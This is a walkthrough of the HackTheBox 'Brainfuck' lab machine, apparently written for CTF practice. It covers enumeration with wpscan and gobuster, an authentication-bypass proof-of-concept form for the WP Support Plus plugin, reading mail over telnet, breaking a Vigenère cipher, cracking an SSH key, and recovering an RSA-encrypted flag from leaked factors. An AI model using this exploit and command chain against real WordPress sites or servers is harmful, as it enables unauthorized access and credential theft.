HTB - Brainfuck
Linux | wpscan | telnet | cipher
Tools For This Room
WPScan - CLI based, WordPress security scanner - leverage WPScan's vulnerability database through its API - requires registration here
sshng2john.py - python script to convert into appropriate format for John the Ripper - download it here
Evolution Mail Client - install with "sudo apt-get install evolution"
TL;DR / Executive Summary
Scan and enumerate with nmap, gobuster and wpscan
Gain foothold with a privesc script for a WordPress plugin
Privesc through an existing file on the system and
Scanning & Enumeration
Let's start off with an nmap scan.
nmap -sV -sC -vv <IP>
We get a few open ports: 22 (SSH), 25 (SMTP), 110 (POP3), 143 (IMAP) and 443 (HTTPS).

Checking out port 443 gives us this page. Do note that we have to use https instead of http.

An interesting point to note in the nmap results for port 443 is the Subject Alternative Name.
"The Subject Alternative Name field lets you specify additional host names (sites, IP addresses, common names, etc.) to be protected by a single SSL Certificate..." - Digicert
We should check out the different domains listed. But first, we'll need to add them to the /etc/hosts file.
sudo nano /etc/hosts
10.10.10.17 www.brainfuck.htb sup3rs3cr3t.brainfuck.htb brainfuck.htb
Let's browse to https://sup3rs3cr3t.brainfuck.htb first. We can accept the warning page and go ahead.

We get a page called the Super Secret Forum, which very likely has important details for us.

Next, let's check out https://brainfuck.htb.
We're greeted by a WordPress page, which is good since it's notorious for having vulnerabilities. We'll enumerate it with gobuster and wpscan.

gobuster
gobuster dir -k -u https://www.brainfuck.htb -w <wordlist>
Due to the expired certificate, we'll add a "-k" flag to ignore the certificate. The results give us a few useful directories, including a login page at /wp-admin.

wpscan
wpscan --url https://brainfuck.htb/ --disable-tls-checks --enumerate p --enumerate t --enumerate u
We get quite a few details, such as the version being 4.7.3, and two users.

Let's run the scan again, but this time using the API token to generate vulnerability data.
Registering on the WPScan website will give us an API token. This allows us to leverage the wpscan vulnerability database which covers WordPress, theme, and plugin vulnerabilities. The free version allows for 25 API requests/day, which translates to roughly one WordPress site.
wpscan --url https://brainfuck.htb --disable-tls-checks --api-token <APItoken>
Gaining Foothold
This results in 50 WordPress vulnerabilities, and 6 plugin vulnerabilities. Looking through the vulnerabilities, we can discount those which require authentication. We try a couple of plugin vulnerabilities but they don't work. However, we can look for more plugin vulnerabilities using searchsploit.
searchsploit wp support plus

We start with the SQLi exploit, but it doesn't seem to work. Let's try the Privilege Escalation one.
cat /usr/share/exploitdb/exploits/php/webapps/40939.txt
Let's copy the Proof of Concept into an .html file, and edit it for our victim site.
gedit bf.html
//paste the PoC in//
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Now we need to browse to the .html file to log in to the WordPress site. In this case, we'll log in as administrator.
file:///<locationofhtmlfile>
// eg: file:///root/user1/bf.html //

Upon browsing to https://brainfuck.htb, we see that we are now administrator.

We don't find anything interesting in this profile, so let's switch over to user admin instead.

This time, we find something interesting. Click on Brainfuck Ltd. in the top right corner, then Themes in the drop down menu. Now select Settings from the list in the left column, then click Easy WP SMTP. Here we see the same email from before, and the SMTP password. Unfortunately, it's not in plaintext.

However, we can view it in plaintext with a neat trick. Right click to Inspect Element and look for the section which contains the SMTP Password. We'll find it in there clear as day.

Now we have a login combination of Orestis/kHGuERB29DNiNE for SMTP. As the name implies, SMTP (Simple Mail Transfer Protocol) is used for e-mail. We now need to use these credentials to access Orestis' emails and see if there's anything useful there. We can either use Telnet to do this, or the Evolution mail client if a GUI is preferred.
To gain a better understanding of what we're doing next and why, we'll go off on a slight tangent and explore SMTP, IMAP, and POP3 first.
All three protocols work at the application layer. SMTP handles outbound email only, while POP3 (Post Office Protocol 3) and IMAP (Internet Message Access Protocol) handle inbound email only. With POP3, the mail server and client are not kept in sync: once mail is downloaded from the server to the client, it's deleted from the server. With IMAP, the server and client are kept in sync, so mail has to be deleted manually. For an animated overview of these protocols, check out this YouTube video.
We can use Telnet to access Orestis' email server through either POP3 or IMAP, but we'll take the IMAP route for this. One thing to note about IMAP commands is that each one must be prefixed with a unique tag (one or more characters). The server labels each response with the tag of the command it answers, so the client can match responses to commands. This post by Moonpoint gives an excellent explanation.
First let's connect to the server:
telnet <IP> 143
Now we need to login. The "A" is the unique character for this command.
A login orestis kHGuERB29DNiNE

Once we're in, we go to the inbox.
B select inbox

Then we get the email.
D fetch 2 body[]
We find another username/password: orestis/kIEnnfEKJ#9UmdO, but this is for the secret forum which we found at the beginning.
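The tagging rule from the IMAP tangent above is worth seeing in code: a client (or anyone reading an IMAP transcript from a packet capture or mail-server log) needs to attach untagged "* ..." data lines to the right command and match each tagged completion line to the tag it sent. The parser below is an added example written for this writeup; it is not from the box, the Moonpoint post or any IMAP library. The transcript it parses is constructed to mirror the A/B/D session above, with one extra line tagged C for a command the client never sent.

```python
import re
from dataclasses import dataclass, field

# Constructed server transcript modelled on the session above: the client sent
# tags A (LOGIN), B (SELECT) and D (FETCH). Lines starting with "* " are untagged
# data the server sends while a command is still outstanding. The line tagged C
# is deliberately a response to a command the client never issued.
SAMPLE_SERVER_LINES = [
    "* OK IMAP4rev1 server ready",
    "A OK LOGIN completed",
    "* 2 EXISTS",
    "* 0 RECENT",
    "* FLAGS (\\Seen \\Deleted)",
    "B OK [READ-WRITE] SELECT completed",
    "* 2 FETCH (FLAGS (\\Seen))",
    "D OK FETCH completed",
    "C BAD Unknown command",
]

# A tagged completion line: <tag> <OK|NO|BAD> <optional text>
TAGGED = re.compile(r"^(?P<tag>[A-Za-z0-9]+) (?P<status>OK|NO|BAD)\b(?P<text>.*)$")


@dataclass
class ImapResult:
    status: str                                  # OK, NO or BAD for this tag
    text: str                                    # human-readable part of the tagged line
    data: list = field(default_factory=list)     # untagged lines received before it


def parse_responses(lines, sent_tags):
    """Pair every tagged completion with the tag the client sent.

    Untagged '* ...' lines are attached to the next completed command, which is
    how a client knows the EXISTS/RECENT/FLAGS lines belong to SELECT and not
    to LOGIN. The server greeting therefore lands on the first command; a real
    client consumes the greeting before sending anything. Lines with a tag the
    client never sent (or already saw completed) are reported separately
    rather than silently accepted.
    """
    results, pending, unexpected = {}, [], []
    for line in lines:
        if line.startswith("* "):
            pending.append(line[2:])
            continue
        m = TAGGED.match(line)
        if m is None or m["tag"] not in sent_tags or m["tag"] in results:
            unexpected.append(line)              # malformed, never-sent or duplicate tag
            continue
        results[m["tag"]] = ImapResult(m["status"], m["text"].strip(), pending)
        pending = []
    return results, unexpected


if __name__ == "__main__":
    completed, odd = parse_responses(SAMPLE_SERVER_LINES, {"A", "B", "D"})
    for tag, result in completed.items():
        print(tag, result.status, result.text, result.data)
    print("unexpected:", odd)
```

The same logic is why a single telnet session can interleave several commands: the tag, not the order of arrival, ties a response to its command.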

Alternative 1: POP3
If we want to take the POP3 route instead, here are the commands we'd use:
telnet <IP> 110
user orestis
pass kHGuERB29DNiNE
retr 2
Alternative 2: Evolution Mail Client
Download the Evolution mail client if it isn't on the attacking machine yet. Next, setup the client using orestis@brainfuck.htb. Then check the inbox for an email from root, and we'll have the password. For more details, check out Rana Khalil's writeup here.
Now that we have credentials to the super secret forum, let's try logging in there.

Nice, we're in. The "SSH Access" thread looks promising, and Orestis and the admin sound like good friends.

As Orestis said, the thread is encrypted.

If we look closely, Orestis has a habit of signing off with his catchphrase: "Orestis - Hacking for fun and profit". We also notice that this phrase is in the encrypted messages, but with different letters each time. This could be used with One-time Pad to get the cipher.
However, let's take a different route and try to identify what type of cipher is being used. We can do this with the Boxentriq online tool, which is the first result on Google.

Pasting in one of the encrypted messages, we get the result: Vigenere Cipher

Now that we've identified the cipher type, let's try to decipher the admin's message. Google suggests the dcode online tool for this.
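The observation about the repeated sign-off is the classic weakness of a repeating-key cipher: any stretch of known plaintext gives the key letters for those positions, and a crib longer than the key reveals the period outright. The code below is an added example, not from the writeup, dcode or Boxentriq; it implements a Vigenère encrypt/decrypt routine and the known-plaintext key recovery the paragraph hints at. The key "wordpress" is constructed for the demo and is not the box's key.

```python
import string

LOWER = string.ascii_lowercase


def _is_letter(ch: str) -> bool:
    # ASCII letters only; punctuation, spaces and digits pass through untouched
    return ch.lower() in LOWER


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Repeating-key shift. Non-letters are kept as-is and do not consume a
    key letter, a common convention for online tools; case is preserved."""
    shifts = [LOWER.index(k) for k in key.lower() if k in LOWER]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, i = [], 0
    for ch in text:
        if _is_letter(ch):
            base = ord("A") if ch.isupper() else ord("a")
            k = shifts[i % len(shifts)]
            if decrypt:
                k = -k
            out.append(chr((ord(ch) - base + k) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_key_stream(ciphertext: str, crib: str, offset: int = 0) -> dict:
    """Known-plaintext step: for each crib letter aligned with the ciphertext,
    key shift = (c - p) mod 26. Returns {key-stream index: key letter}."""
    stream_idx = sum(1 for ch in ciphertext[:offset] if _is_letter(ch))
    recovered = {}
    for c, p in zip(ciphertext[offset:], crib):
        if _is_letter(c) != _is_letter(p):
            raise ValueError("crib does not line up with the ciphertext")
        if _is_letter(c):
            recovered[stream_idx] = LOWER[(ord(c.lower()) - ord(p.lower())) % 26]
            stream_idx += 1
    return recovered


def fold_key(stream: dict, period: int) -> str:
    """Fold a recovered key stream onto a candidate period; raise if two
    stream positions that map to the same key slot disagree."""
    slots = [None] * period
    for idx, letter in stream.items():
        slot = idx % period
        if slots[slot] not in (None, letter):
            raise ValueError(f"period {period} is inconsistent with the crib")
        slots[slot] = letter
    return "".join(s or "?" for s in slots)   # '?' marks slots the crib never covered


def find_period(stream: dict, max_period: int = 20) -> int:
    """Smallest period the recovered stream is consistent with. Reliable only
    when the crib is longer than the key, which a repeated sign-off provides."""
    for period in range(1, max_period + 1):
        try:
            fold_key(stream, period)
            return period
        except ValueError:
            continue
    raise ValueError("no consistent period up to max_period")


# Constructed demo values: the key is made up for this example, not the box's.
DEMO_KEY = "wordpress"
SIGN_OFF = "Orestis - Hacking for fun and profit"


def demo() -> str:
    ciphertext = vigenere(SIGN_OFF, DEMO_KEY)
    stream = recover_key_stream(ciphertext, SIGN_OFF)   # the crib is the sign-off itself
    return fold_key(stream, find_period(stream))


if __name__ == "__main__":
    print(vigenere(SIGN_OFF, DEMO_KEY))
    print("recovered key:", demo())
```

With a crib of 29 letters and a 9-letter key, every key slot is covered more than once, so the smallest consistent period is the true one; a crib shorter than the key would leave "?" slots and several candidate periods.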

We have our results in the left column. Visiting https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa downloads a file which requires a password. This is likely what the admin was referring to when he said he hopes Orestis remembers it, since he doesn't.
Since neither of the passwords from before works, we'll try to crack the passphrase with John the Ripper. But first we'll need to convert the key file into JtR's format, using this tool.
python sshng2john.py <id_rsafile> > <convertedfile>
Now to crack it wide open.
john <convertedfile> --wordlist=rockyou.txt
We get the password 3poulakia!

Let's grant the id_rsa file the necessary permissions, and we can SSH in.
chmod 600 id_rsa
ssh -i id_rsa orestis@brainfuck.htb
Now we can grab that user flag:

Privilege Escalation
After trying the usual array of simple privesc commands, we find nothing. Upon closer examination of the files, we find 3 files which stand out: debug.txt, encrypt.sage, and output.txt.


Examining the script in encrypt.sage, we find that it's encrypting the root flag and printing it to output.txt. It's also printing the value of p, q, and e to debug.txt. A Google search result tells us that the script is related to RSA too. Let's just Google these terms to get a clearer picture.

From the post, we get a script to decrypt the contents of root.txt. We just need to modify it with our own p, q, e, and ct values.

Now we run the script, and get the output.

However, the output is in decimal. We need to convert it to hexadecimal, then to ASCII to get our flag.
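The reason debug.txt is fatal is simple: RSA's private exponent d is nothing more than the inverse of e modulo (p-1)(q-1), so anyone who can read p, q and e can reconstruct d and decrypt output.txt. The script below is an added example written for this writeup, not encrypt.sage and not the script from the post the writeup found; it shows the recovery end to end, including the decimal-to-hex-to-ASCII step done by hand above. The primes, exponent and plaintext are constructed for the demo (two Mersenne primes keep the modulus readable; real keys use far larger primes, but the arithmetic is the same).

```python
def egcd(a: int, b: int):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y


def modinv(a: int, m: int) -> int:
    g, x, _ = egcd(a, m)
    if g != 1:
        raise ValueError("e is not invertible modulo phi(n); not a valid RSA key")
    return x % m


def rsa_private_exponent(p: int, q: int, e: int) -> int:
    """The leak that matters: with p and q on disk, d is one modular inverse away.
    Logging these (as the debug file on the box does) is equivalent to logging
    the private key."""
    return modinv(e, (p - 1) * (q - 1))


def rsa_decrypt_from_factors(p: int, q: int, e: int, ct: int) -> int:
    d = rsa_private_exponent(p, q, e)
    return pow(ct, d, p * q)


def int_to_ascii(m: int) -> str:
    """The writeup's last step: decimal -> hex -> ASCII."""
    hex_digits = format(m, "x")
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits        # bytes.fromhex needs an even digit count
    return bytes.fromhex(hex_digits).decode("ascii")


def ascii_to_int(s: str) -> int:
    return int.from_bytes(s.encode("ascii"), "big")


# Constructed parameters for the demo (not the values from the box).
P = 2**31 - 1          # Mersenne prime
Q = 2**61 - 1          # Mersenne prime
E = 65537              # gcd(E, (P-1)*(Q-1)) == 1, checked by modinv()


def demo(plaintext: str = "HTB{demo}") -> str:
    """Encrypt a constructed flag the way an encrypt.sage-style script would,
    then recover it using only what a leaked debug file would contain."""
    n = P * Q
    m = ascii_to_int(plaintext)
    if m >= n:
        raise ValueError("message too large for this toy modulus")
    ct = pow(m, E, n)                                   # what goes to output.txt
    recovered = rsa_decrypt_from_factors(P, Q, E, ct)   # what debug.txt makes possible
    return int_to_ascii(recovered)


if __name__ == "__main__":
    print(demo())
```

A check worth running on any such script is `egcd(e, (p-1)*(q-1))[0] == 1`; if it fails the key was never valid. The defensive lesson is the mirror image of the exploit: p, q and d must never reach a log or a world-readable file, and a script that needs a debug mode should print only the public values n and e.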

And we are finally done.